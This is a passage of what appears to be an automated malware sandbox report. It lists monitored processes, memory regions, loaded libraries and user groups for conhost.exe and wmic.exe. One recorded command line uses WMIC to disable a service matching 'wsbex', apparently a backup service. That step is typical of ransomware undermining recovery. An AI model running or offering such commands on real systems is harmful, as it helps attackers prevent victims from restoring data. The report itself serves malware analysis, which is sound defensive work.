"c:\\windows\\system32\\conhost.exe" page_root = "0x7a2d000" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0xf88" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4026 start_va = 0x7ff22000 end_va = 0x7ff22fff entry_point = 0x0 region_type = private name = "private_0x000000007ff22000" filename = "" Region: id = 4027 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4028 start_va = 0x77ee720000 end_va = 0x77ee73ffff entry_point = 0x0 region_type = private name = "private_0x00000077ee720000" filename = "" Region: id = 4029 start_va = 0x77ee740000 end_va = 0x77ee753fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077ee740000" filename = "" Region: id = 4030 start_va = 0x77ee760000 end_va = 0x77ee79ffff entry_point = 0x0 region_type = private name = "private_0x00000077ee760000" filename = "" Region: id = 4031 start_va = 0x7df5ff110000 end_va = 0x7ff5ff10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff110000" filename = "" Region: id = 4032 start_va = 0x7ff6c46f0000 end_va = 0x7ff6c4712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46f0000" filename = "" Region: id = 4033 start_va = 0x7ff6c4716000 end_va = 0x7ff6c4716fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4716000" filename = "" Region: id = 4034 start_va = 0x7ff6c471e000 end_va = 0x7ff6c471ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c471e000" filename = "" Region: id = 4035 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 4036 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4037 start_va = 0x77ee910000 end_va = 0x77eea0ffff entry_point = 0x0 region_type = private name = "private_0x00000077ee910000" filename = "" Region: id = 4038 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4039 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4040 start_va = 0x77ee720000 end_va = 0x77ee72ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077ee720000" filename = "" Region: id = 4041 start_va = 0x77ee730000 end_va = 0x77ee736fff entry_point = 0x0 region_type = private name = "private_0x00000077ee730000" filename = "" Region: id = 4042 start_va = 0x77ee7a0000 end_va = 0x77ee85dfff entry_point = 0x77ee7a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4043 start_va = 0x77ee860000 end_va = 0x77ee89ffff entry_point = 0x0 region_type = private name = "private_0x00000077ee860000" filename = "" Region: id = 4044 start_va = 0x77ee8a0000 end_va = 0x77ee8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077ee8a0000" filename = "" Region: id = 4045 start_va = 0x77ee8b0000 end_va = 0x77ee8b6fff entry_point = 0x0 region_type = private name = "private_0x00000077ee8b0000" filename = "" Region: id = 4046 start_va = 0x77ee8c0000 end_va = 0x77ee8c0fff entry_point = 0x0 region_type = private name = "private_0x00000077ee8c0000" filename = "" Region: id = 4047 start_va = 0x77ee8d0000 end_va = 0x77ee8d0fff entry_point = 0x0 region_type = private name = "private_0x00000077ee8d0000" filename = "" Region: id = 4048 start_va = 0x77eea80000 end_va = 0x77eea8ffff entry_point = 0x0 region_type = private name = "private_0x00000077eea80000" filename = "" Region: id = 4049 start_va = 0x77eea90000 end_va = 0x77eec17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077eea90000" filename = "" Region: id = 4050 start_va = 0x77eec20000 end_va = 0x77eeda0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077eec20000" filename = "" Region: id = 4051 start_va = 0x77eedb0000 end_va = 0x77f01affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077eedb0000" filename = "" Region: id = 4052 start_va = 0x7ff6c45f0000 end_va = 0x7ff6c46effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c45f0000" filename = "" Region: id = 4053 start_va = 0x7ff6c471c000 end_va = 0x7ff6c471dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c471c000" filename = "" Region: id = 4054 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 4055 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4056 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4057 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4058 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4059 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4060 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4061 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4062 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4063 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4064 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4065 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 276 os_tid = 0xf94 Thread: id = 277 os_tid = 0xf98 Thread: id = 278 os_tid = 0xf9c Process: id = "63" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x429ad000" os_pid = "0xfa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0xf88" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4079 start_va = 0x760000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 4080 start_va = 0x780000 end_va = 0x781fff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 4081 start_va = 0x790000 end_va = 0x7a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4082 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 4083 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 4084 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 4085 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 4086 start_va = 0x850000 end_va = 0x851fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 4087 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 4088 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 4089 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4090 start_va = 0x7ea60000 end_va = 0x7ea82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea60000" filename = "" Region: id = 4091 start_va = 0x7ea86000 end_va = 0x7ea86fff entry_point = 0x0 region_type = private name = "private_0x000000007ea86000" filename = "" Region: id = 4092 start_va = 0x7ea8c000 end_va = 0x7ea8cfff entry_point = 0x0 region_type = private name = "private_0x000000007ea8c000" filename = "" Region: id = 4093 start_va = 0x7ea8d000 end_va = 0x7ea8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea8d000" filename = "" Region: id = 4094 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4095 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4096 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4097 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4098 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4099 start_va = 0x980000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 4100 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4101 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4102 start_va = 0xa00000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 4103 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4104 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 4105 start_va = 0x770000 end_va = 0x773fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 4106 start_va = 0x860000 end_va = 0x91dfff entry_point = 0x860000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4107 start_va = 0x920000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 4108 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 4109 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 4110 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4111 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4112 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4113 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4114 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4115 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4116 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4117 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4118 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4119 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4120 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4121 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4122 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4123 start_va = 0x7e960000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e960000" filename = "" Region: id = 4124 start_va = 0x7ea89000 end_va = 0x7ea8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ea89000" filename = "" Region: id = 4125 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4126 start_va = 0x780000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 4127 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4128 start_va = 0x960000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 4129 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4130 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4131 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4132 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4133 start_va = 0xb00000 end_va = 0xe36fff entry_point = 0xb00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4134 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4135 start_va = 0xe40000 end_va = 0xf28fff entry_point = 0xe40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4136 start_va = 0x9d0000 end_va = 0x9d3fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 4137 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 4138 start_va = 0xe40000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 4139 start_va = 0xf70000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 4140 start_va = 0xf70000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 4141 start_va = 0x1120000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 4142 start_va = 0xe40000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 4143 start_va = 0xf60000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 4144 start_va = 0xe80000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 4145 start_va = 0xf70000 end_va = 0x104efff entry_point = 0xf70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4146 start_va = 0x10f0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 4147 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 4148 start_va = 0x9e0000 end_va = 0x9e0fff entry_point = 0x9e0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 4149 start_va = 0xe40000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 4150 start_va = 0xe70000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 4151 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4152 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4153 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4154 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4155 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4156 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4157 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4158 start_va = 0xe80000 end_va = 0xea9fff entry_point = 0xe80000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4159 start_va = 0xec0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 4160 start_va = 0x1130000 end_va = 0x12b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 4161 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4162 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4163 start_va = 0x9f0000 end_va = 0x9fffff entry_point = 0x9f0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 4164 start_va = 0x5770000 end_va = 0x58f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 4165 start_va = 0x5900000 end_va = 0x6cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005900000" filename = "" Region: id = 4166 start_va = 0xe60000 end_va = 0xe60fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 4167 start_va = 0xe80000 end_va = 0xe80fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 4168 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4169 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4170 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4171 start_va = 0x6d00000 end_va = 0x6dcffff entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 4172 start_va = 0xe90000 end_va = 0xe90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 4173 start_va = 0x6d00000 end_va = 0x6db7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d00000" filename = "" Region: id = 4174 start_va = 0x6dc0000 end_va = 0x6dcffff entry_point = 0x0 region_type = private name = "private_0x0000000006dc0000" filename = "" Region: id = 4175 start_va = 0xe90000 end_va = 0xe93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 4176 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4177 start_va = 0x6dd0000 end_va = 0x6ecffff entry_point = 0x0 region_type = private name = "private_0x0000000006dd0000" filename = "" Region: id = 4178 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4179 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4180 start_va = 0xed0000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 4181 start_va = 0xf10000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 4182 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 4183 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 4184 start_va = 0x12c0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4185 start_va = 0x6ed0000 end_va = 0x6f0ffff entry_point = 